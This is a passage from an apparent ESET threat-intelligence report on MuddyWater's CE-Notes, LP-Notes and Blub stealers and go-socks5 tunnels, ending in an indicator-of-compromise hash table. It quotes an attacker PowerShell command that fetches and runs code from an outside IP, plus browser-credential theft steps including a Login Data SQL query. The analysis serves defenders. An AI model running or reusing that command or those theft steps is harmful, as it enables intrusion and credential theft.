Israel.<\/p>\n<p>CE-Notes was downloaded with the following PowerShell command:<\/p>\n<p><span>&#8220;C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe&#8221; (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http:\/\/206.71.149[.]51:443\/57576?filter_relational_operator_2=60169).content | Invoke-Expression<\/span><\/p>\n<p>Both versions of the browser-data stealer attempt to steal and decrypt the app-bound encryption key stored in the Local State file (<span>%APPDATA%LocalGoogleChromeUser DataLocal State<\/span>) of Chromium browsers (Chrome, Brave, and Edge). <a href=\"https:\/\/security.googleblog.com\/2024\/07\/improving-security-of-chrome-cookies-on.html\">App-bound encryption<\/a> was introduced in Chrome version 127, enabling Chrome to encrypt data tied to app identity. <a href=\"https:\/\/redcanary.com\/blog\/threat-intelligence\/google-chrome-app-bound-encryption\/\">Cybercriminals<\/a> and APT groups have caught on and are actively trying to work around app-bound encryption to steal session keys. CE-Notes is quite similar to <a href=\"https:\/\/github.com\/xaitax\/Chrome-App-Bound-Encryption-Decryption\">ChromElevator<\/a> on GitHub.<\/p>\n<p>The collected data is AES-CBC encrypted using the CNG API with the key <span>9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F<\/span> and the IV <span>4103A09887B82FFD56A93BB431805224<\/span>.<\/p>\n<p>Then the encrypted data is stored on disk in <span>C:UsersPublicDownloadsce-notes.txt<\/span> for later retrieval (probably via an RMM tool, since neither the EXE nor the DLL versions have any means of exfiltrating the file). The primary difference between the EXE and the DLL is the virtual machine evasion functionality added to the DLL.<\/p>\n<p>We observed the CE-Notes browser-data stealer in the following locations:<\/p>\n<ul>\n<li><span>C:system2.dll<\/span><\/li>\n<li><span>C:UsersPublicDownloadssystem2.dll<\/span><\/li>\n<li><span>C:Intelsystem.dll<\/span><\/li>\n<li><span>C:20240926_165509.exe<\/span><\/li>\n<\/ul>\n<h3>LP-Notes credential stealer<a><\/a><\/h3>\n<p>LP-Notes is a C\/C++ Windows credential stealer with the same design as the CE-Notes browser-data stealer. Following the same naming convention as in the case of CE-Notes, we named the stealer LP-Notes based on the local file it uses to stage stolen credentials before exfiltration: <span>C:UsersPublicDownloadslp-notes.txt<\/span> (vs. <span>C:UsersPublicDownloadsce-notes.txt<\/span>). The sole purpose of LP-Notes is to entice victims into submitting their credentials by displaying a fake Windows Security dialog, prompting them to enter their Windows username and password. We have observed an instance of LP-Notes being downloaded and executed by PowerShell with a very similar command line to that shown in the CE-Notes section.<\/p>\n<h4>Initialization<\/h4>\n<p>On execution, LP-Notes starts by searching for a process named <span>taskhostw.exe<\/span> (Host Process for Windows Tasks) and then impersonating the security context of the process (via the <span>ImpersonateLoggedOnUser<\/span> API); only then does LP-Notes activate its malicious payload.<\/p>\n<p>LP-Notes employs several simple obfuscation techniques, including a custom, addition-based routine for string decryption. Figure 5 shows the function that decrypts strings of lengths ranging from 15 to 19 characters, though the decryption key is always the same \u2013 a set of predefined constants that are added or subtracted from each byte of the string. Interestingly, CE-Notes uses the same decryption routine, except for a different decryption key, as shown in Figure 6.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 5. LP-Notes string decryption routine\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-5.png\" title=\"Figure 5. LP-Notes string decryption routine\" width=\"\"><figcaption><em>Figure 5. LP-Notes string decryption routine<\/em><\/figcaption><\/figure>\n<figure><img decoding=\"async\" alt=\"Figure 6. CE-Notes string decryption routine, similar to that of LP-Notes\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-6.png\" title=\"Figure 6. CE-Notes string decryption routine, similar to that of LP-Notes\" width=\"\"><figcaption><em>Figure 6. CE-Notes string decryption routine, similar to that of LP-Notes<\/em><\/figcaption><\/figure>\n<p>LP-Notes uses string stacking for strings shorter than 15 or longer than 19 characters, including the decryption key, IV, and import names. Finally, to obscure the use of Windows API functions and to make static analysis more challenging, LP-Notes dynamically resolves the API functions during the C runtime startup, before the execution of the <span>WinMain<\/span> function, the standard entry point for a graphical Windows-based application per <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/winbase\/nf-winbase-winmain\">Microsoft<\/a>, thus hiding direct references to the API functions from pseudocode view (see Figure 7).<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 7. LP-Notes WinMain function with obfuscated import names vs deobfuscated view\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-7.png\" title=\"Figure 7. LP-Notes WinMain function with obfuscated import names (left) vs. deobfuscated view (right)\" width=\"\"><figcaption><em>Figure 7. LP-Notes <\/em><span>WinMain<\/span><em> function with obfuscated import names (left) vs. deobfuscated view (right)<\/em><\/figcaption><\/figure>\n<h4>Capabilities<\/h4>\n<p>In an endless loop, LP-Notes displays a fake Windows Security dialog prompting the victim to enter their Windows username and password, as shown in Figure 8 (via the <span>CredUIPromptForWindowsCredentialsW<\/span> API). Note that although similar, this is not the same as the fake credential prompt used by MuddyViper (see Figure 4). It immediately confirms the validity of any submitted credentials by attempting to log on as that user (via the <span>CredUnPackAuthenticationBufferW<\/span> and <span>LogonUserW<\/span> APIs).<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 8. A fake Windows Security dialog displayed by LP-Notes\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-8.png\" title=\"Figure 8. A fake Windows Security dialog displayed by LP-Notes\" width=\"\"><figcaption><em>Figure 8. A fake Windows Security dialog displayed by LP-Notes<\/em><\/figcaption><\/figure>\n<p>If successful, the harvested credentials are then AES-CBC encrypted using the CNG API with the key <span>ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC<\/span> and the IV <span>91A4E6F6D51DAEE773A8F00279792578<\/span>.<\/p>\n<p>Similar to CE-Notes, LP-Notes then stores the encrypted credentials in a local file \u2013 in this case <span>C:UsersPublicDownloadslp-notes.txt<\/span>. As neither of these components have the capability to exfiltrate data, another component presumably handles this (either an RMM tool or MuddyViper).<\/p>\n<h3>Blub browser-data stealer<\/h3>\n<p>Blub is a C\/C++ browser-data stealer incorporating a statically linked SQLite library. The name is derived from its filename, <span>Blub.exe<\/span>. We observed the PDB path <span>C:Usersjojosourcereposstealerx64Releasestealer.pdb<\/span>. It steals user login data from Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera web browsers.<\/p>\n<h4>Chromium-based browsers<\/h4>\n<p>For Chrome, Blub first terminates chrome.exe (if running) and then parses and decrypts the encryption key from <span>C:Users&lt;username&gt;AppDataLocalGoogleChromeUser DataLocal State<\/span>. This key is used to encrypt sensitive data stored by Chrome, such as passwords or cookies, and it is protected by the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Data_Protection_API\">Data Protection API (DPAPI)<\/a> so that it can only be decrypted on the system where it was originally encrypted. Blub decrypts this key via the <span>CryptUnprotectData<\/span> API, and then uses it to decrypt user credentials obtained from all existing Chrome user profiles on the compromised computer. The credentials, stored in <span>C:Users&lt;username&gt;AppDataLocalGoogleChromeUser Data&lt;profile_name&gt;Login Data<\/span>, are obtained via the following SQL query:<\/p>\n<p><span>SELECT origin_url, username_value, password_value FROM logins<\/span><\/p>\n<p>A similar series of steps is used to obtain and decrypt user credentials from Microsoft Edge and Opera user profiles, using the key obtained from <span>C:Users&lt;username&gt;AppDataLocalMicrosoftEdgeUser DataLocal State<\/span> and <span>C:Users&lt;username&gt;AppDataRoamingOpera SoftwareOpera StableLocal State<\/span>, respectively.<\/p>\n<h4>Firefox<\/h4>\n<p>Finally, to decrypt stored user credentials for Mozilla Firefox, Blub parses the <span>hostname<\/span>, <span>encryptedUsername<\/span>, and <span>encryptedPassword<\/span> values from the <span>logins.json<\/span> file in each user\u2019s profile directory, i.e., <span>%APPDATAROAMING%MozillaFirefoxProfiles&lt;profile_name&gt;<\/span>. The credentials are then decrypted using the <span>PK11SDR_Decrypt<\/span> function from the <span>nss3.dll<\/span> library used by Firefox.<\/p>\n<p>The collected data is stored into a local file named <span>file.txt<\/span>, with no encryption. The same data is logged onto the console, with no encryption, along with verbose status messages. Blub has no capability to exfiltrate this file.<\/p>\n<p>Note that Blub checks for running processes associated with security solutions before executing its malicious payload, focusing on the combination of <span>afwServ.exe<\/span> (Avast firewall) and <span>AvastSvc.exe<\/span> (Avast antivirus) processes. If afwServ.exe is detected running (but not <span>AvastSvc.exe<\/span>), Blub concludes that Norton is running (which now uses the <a href=\"https:\/\/community.norton.com\/t\/norton-with-avast-engine\/370204\/3\">Avast engine<\/a>) on the compromised host, and exits. If <span>AvastSvc.exe<\/span> (Avast) is detected, Blub continues with the execution, except it skips stealing credentials from Microsoft Edge.<\/p>\n<p>While Blub\u2019s strings are stored in cleartext, a simple obfuscation technique is used for strings associated with the Google Chrome data stealer functionality. Specifically, multiple strings are concatenated into one long string, with 16 random characters between them, apparently to hide them from view during static analysis:<\/p>\n<p><span>gdGlog}o{eRwjpw&amp;&#8221;encrypted_key&#8221;:FAe[{hy|b-vcJvxGImpersonateLoggeh}gdOvlgt_NxuoolOpenProcessTokenVLUKKW&#8217;xxqjpwe}uDuplicateTokenExs5&amp;}vl{tiplh|io|eIpuvvkdXznx(Gh}n2(sh|y\u2302ryme~ds~<\/span><\/p>\n<p>Removing the junk characters and splitting the strings returns:<\/p>\n<ul>\n<li><span>&#8220;encrypted_key&#8221;:<\/span><\/li>\n<li><span>ImpersonateLogge<\/span><\/li>\n<li><span>OpenProcessToken<\/span><\/li>\n<li><span>DuplicateTokenEx<\/span><\/li>\n<\/ul>\n<h3>go\u2011socks5 reverse tunnels<\/h3>\n<p>MuddyWater\u2019s go\u2011socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as go\u2011socks5, yamux, and resocks; they have been frequently used in MuddyWater\u2019s recent campaigns.<\/p>\n<p>Most of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build configuration strings shown in Figure 9 and in other artifacts.<\/p>\n<pre><code>path ESETGO mod ESETGO (devel) dep github.com\/armon\/go-socks5 v0.0.0-20160902184237-e75332964ef5h1:0CwZNZbxp69SHPdPJAN\/hZIm0C4OItdklCFmMRWYpio= dep github.com\/hashicorp\/yamux v0.1.1 h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE= dep golang.org\/x\/net v0.29.0 h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo= dep golang.org\/x\/sys v0.25.0 h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34= build -buildmode=exe build -compiler=gc build -ldflags=\"-w -s\" build CGO_ENABLED=1 build CGO_CFLAGS= build CGO_CPPFLAGS= build CGO_CXXFLAGS= build CGO_LDFLAGS= build GOARCH=amd64 build GOOS=windows build GOAMD64=v1<\/code><\/pre>\n<p><a><\/a><a><\/a><em>Figure 9. Build configuration strings from MuddyWater\u2019s go\u2011socks5 variants<\/em><\/p>\n<p>The primary purpose of MuddyWater\u2019s go\u2011socks5 proxy is to relay communication between the compromised machine (on a specific port) and a hardcoded C&amp;C server, using a hardcoded connection key to authenticate with the C&amp;C server via SSL\/TLS. This setup allows the attacker to route C&amp;C traffic (potentially related to other compromises) through the compromised machine and thus to hide the location of the real C&amp;C server.<\/p>\n<h2>Conclusion<\/h2>\n<p>This campaign indicates an evolution in the operational maturity of MuddyWater. The deployment of previously undocumented components \u2013 such as the Fooder loader and MuddyViper backdoor \u2013 signals an effort to enhance stealth, persistence, and credential harvesting capabilities. The use of game-inspired evasion techniques, reverse tunneling, and a diversified toolset reflects a more refined approach than in earlier campaigns, even though traces of the group\u2019s operational immaturity remain.<\/p>\n<p>MuddyWater continues to demonstrate the ability to execute campaigns ranging from average to above average, i.e., being timely, effective, and increasingly challenging to defend against. While we assess that MuddyWater will remain a leading actor in Iranian-nexus activity, we anticipate a continued pattern of typical campaigns enhanced by more advanced TTPs.<\/p>\n<p>ESET will continue to monitor the group\u2019s activities, focusing on further signs of technical advancement and strategic targeting of government, military, telecommunications, and critical infrastructure.<\/p>\n<blockquote>\n<div><em>For any inquiries about our research published on WeLiveSecurity, please contact us at <a href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>. <\/em><\/div>\n<div><em>ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=muddywater-snakes-riverbank&amp;sfdccampaignid=7011n0000017htTAAQ\">ESET Threat Intelligence<\/a> page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<h3>Files<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"132\"><strong>Filename<\/strong><\/td>\n<td width=\"170\"><strong>Detection<\/strong><\/td>\n<td width=\"161\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span>76632910CF67697BF5D7<wbr><\/wbr>285FAE38BFCF438EC082<\/span><\/td>\n<td width=\"132\"><span>OsUpdater<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.E<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder launcher.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>1723D5EA7185D2E339FA<wbr><\/wbr>9529D245DAA5D5C9A932<\/span><\/td>\n<td width=\"132\"><span>Blub<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.H<\/td>\n<td width=\"161\">MuddyWater \u2013 Blub browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>69B097D8A3205605506E<wbr><\/wbr>6C1CC3C13B71091CB519<\/span><\/td>\n<td width=\"132\"><span>Blub<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.H<\/td>\n<td width=\"161\">MuddyWater \u2013 Blub browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B7A8F09CB5FF8A336539<wbr><\/wbr>88FFBA585118ACF24C13<\/span><\/td>\n<td width=\"132\"><span>Blub<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.H<\/td>\n<td width=\"161\">MuddyWater \u2013 Blub browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B8997526E4781A6A1479<wbr><\/wbr>690E30072F38E091899D<\/span><\/td>\n<td width=\"132\"><span>stealer<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.H<\/td>\n<td width=\"161\">MuddyWater \u2013 Blub browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>8E21DE54638A79D8489C<wbr><\/wbr>59D958B23FE22E90944A<\/span><\/td>\n<td width=\"132\"><span>7d1e9726b5YZPYc<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"170\">Win32\/MuddyWater.B<\/td>\n<td width=\"161\">MuddyWater \u2013 CE-Notes browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>CD47420F5CE408D95C98<wbr><\/wbr>306D78B977CDA0400C8F<\/span><\/td>\n<td width=\"132\"><span>fe197add74IVcQn<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.I<\/td>\n<td width=\"161\">MuddyWater \u2013 CE-Notes browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>C1299E8C9A8567A9C292<wbr><\/wbr>157F3ED65B818AA78900<\/span><\/td>\n<td width=\"132\"><span>vmsvc<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.I<\/td>\n<td width=\"161\">MuddyWater \u2013 CE-Notes browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>29CDA06701F9A9C0A679<wbr><\/wbr>1775C3EB70F5B52BBEFF<\/span><\/td>\n<td width=\"132\"><span>3a70e4c8c2IVcQn<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.C<\/td>\n<td width=\"161\">MuddyWater \u2013 LP-Notes credential stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>8F3ED626E7B929450E36<wbr><\/wbr>E97BA5539C8371DF0EF8<\/span><\/td>\n<td width=\"132\"><span>3a70e4c8c2IVcQn<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.C<\/td>\n<td width=\"161\">MuddyWater \u2013 LP-Notes credential stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>007B5CD6D6ACF972F774<wbr><\/wbr>3F79E23CAB9BB2ECBEE3<\/span><\/td>\n<td width=\"132\"><span>Dsync-es<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.F<\/td>\n<td width=\"161\">MuddyWater \u2013 Mimikatz loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>CD36F93DBC4C71893059<wbr><\/wbr>3D8F029EFDCAA52B619B<\/span><\/td>\n<td width=\"132\"><span>App_chek<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded HackBrowserData tool.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>47B70C47BEB33E88B419<wbr><\/wbr>7D6AF1B768230E51B067<\/span><\/td>\n<td width=\"132\"><span>steam<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D46900D78AE036967E0B<wbr><\/wbr>37F9EC6A8000131AE604<\/span><\/td>\n<td width=\"132\"><span>antimage<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win32\/MuddyWater.A<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>0657D0B0610618886DDD<wbr><\/wbr>74C3D0A1D582CDD24863<\/span><\/td>\n<td width=\"132\"><span>wtsapi32.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>2939FD218E0145D730BD<wbr><\/wbr>94AA1C76386A5259EACE<\/span><\/td>\n<td width=\"132\"><span>msi.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3BC6502A55A4D5D29132<wbr><\/wbr>DA4D9943E154A810CC83<\/span><\/td>\n<td width=\"132\"><span>WinWin<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>7950296331802188EB99<wbr><\/wbr>E232E2C383CB9FDD5D7D<\/span><\/td>\n<td width=\"132\"><span>20241118_223247<wbr><\/wbr>_Launcher<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>8580824FE14DB1583881<wbr><\/wbr>02B16C1C79DFBBA36083<\/span><\/td>\n<td width=\"132\"><span>Launcher.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B48B93B4EB69D01588D3<wbr><\/wbr>71356EDE614C5E7378DE<\/span><\/td>\n<td width=\"132\"><span>Launcher<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>EA8A1C2382FF765709D7<wbr><\/wbr>F78EF60482598E4C0DEB<\/span><\/td>\n<td width=\"132\"><span>vcruntime140_1<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>EAF4BAFC62170C9FCA1F<wbr><\/wbr>6B591848883DBF97F93D<\/span><\/td>\n<td width=\"132\"><span>Launcher<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>F5EFBA6CCBA5A6AD6C3A<wbr><\/wbr>FA928C0E5EAA44597411<\/span><\/td>\n<td width=\"132\"><span>ncrypt.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>13DA612D75DC5268F523<wbr><\/wbr>5F5BACE6D8F0DB0091FF<\/span><\/td>\n<td width=\"132\"><span>WinWin(persist)<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>25361183DE63F296BA71<wbr><\/wbr>B6FCF0725E022B3C989A<\/span><\/td>\n<td width=\"132\"><span>0bff183a39ruQsY<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>0E9A4892CFA1C9065B36<wbr><\/wbr>D8F2E164E28609A8CF5D<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>2B09241CA025BDC4455E<wbr><\/wbr>9F6BA6009E2F27C08EDF<\/span><\/td>\n<td width=\"132\"><span>dttcodexgigas<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>2E9BE23CDD8152DB6CD1<wbr><\/wbr>A54E001C4EA82FF6F1C6<\/span><\/td>\n<td width=\"132\"><span>7295be2b1fHxjyf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>45FA7DE711FEA1F8D1E3<wbr><\/wbr>48E87834246C455DD2ED<\/span><\/td>\n<td width=\"132\"><span>fa54125dc8ZpaNJ<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>4E0EF2386980639FC535<wbr><\/wbr>5FD68DAFF54EB2AD622E<\/span><\/td>\n<td width=\"132\"><span>20d188afdcWgOQB<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>4E9529BA4A6E42D6278D<wbr><\/wbr>37E3FDEE9E1D991CEBE0<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bHOVby<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>50C6D4A2AD16A231CF11<wbr><\/wbr>C43F3BBC868D90E20D25<\/span><\/td>\n<td width=\"132\"><span>re<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.F<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>52009F36058337B6401D<wbr><\/wbr>A0A0F4885A0C185F0520<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bHOVby<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>535882B6EDAB29247E03<wbr><\/wbr>5236A84CA510FB1E0854<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>544CE18E4C1F1B288DEE<wbr><\/wbr>6018DFCF4E4D4A315F7A<\/span><\/td>\n<td width=\"132\"><span>1110254b63WfTEa<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>54EBC125039CC83E4682<wbr><\/wbr>CA44DD592534562B25C3<\/span><\/td>\n<td width=\"132\"><span>FMAPP.dll<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5A08150C1DC17E9F6912<wbr><\/wbr>96F0A577C2EC9BA8028C<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bJeJOf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 proxy reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5D1E61DA8083C41FF1FC<wbr><\/wbr>23A1222A4A88B43A4E9B<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bJeJOf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>6532E0437C8913FA418F<wbr><\/wbr>1EE258561B15BBEE9052<\/span><\/td>\n<td width=\"132\"><span>7295be2b1fHxjyf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>6CA41565844118385B34<wbr><\/wbr>5A39A9B79E0BBC0DD338<\/span><\/td>\n<td width=\"132\"><span>re<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.F<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>6FC50A99AAE1D6C40111<wbr><\/wbr>632D4F49BD19F9794CF6<\/span><\/td>\n<td width=\"132\"><span>8525e604dfKuDNr<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>826CFF5D85713CE4B2F3<wbr><\/wbr>C15AB53A84E6848D2E2C<\/span><\/td>\n<td 